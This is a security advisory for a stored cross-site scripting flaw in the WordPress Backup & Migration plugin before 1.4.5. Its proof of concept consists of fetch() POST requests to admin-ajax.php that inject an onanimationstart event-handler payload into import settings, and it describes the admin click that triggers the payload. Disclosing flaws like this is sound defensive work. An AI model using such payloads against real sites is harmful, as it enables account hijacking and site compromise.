WordPress Backup & Migration < 1.4.5 - Subscriber+ Stored XSS

Description The plugin does not sanitise and escape some parameters, which could allow users with a role as low as Subscriber to perform Cross-Site Scripting attacks. This was partially fixed in version 1.4.4 but it still allowed XSS attacks from Admin users.

PoC

fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded; charset=UTF-8”, }, “body”: “settings_data%5Bim_data_size_per_req%5D=1&settings;_data%5Bim_db_file_per_req%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)+x&action;=mgdp_plugin_save_import_settings”, “method”: “POST”, “mode”: “cors”, “credentials”: “include” }); Then the admin needs to click http://127.0.0.1:8001/wp-admin/admin.php?page=wp-migration-duplicator#wt-mgdp-import -> advanced options -– On version 1.4.4, a site admin must run the following command on the Backup & Migration page: fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded; charset=UTF-8”, }, “body”: “settings_data%5Bim_data_size_per_req%5D=1&settings;_data%5Bim_db_file_per_req%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)+x&action;=mgdp_plugin_save_import_settings&_wpnonce=” + wp_migration_duplicator_import.nonces.main, “method”: “POST”, “mode”: “cors”, “credentials”: “include” })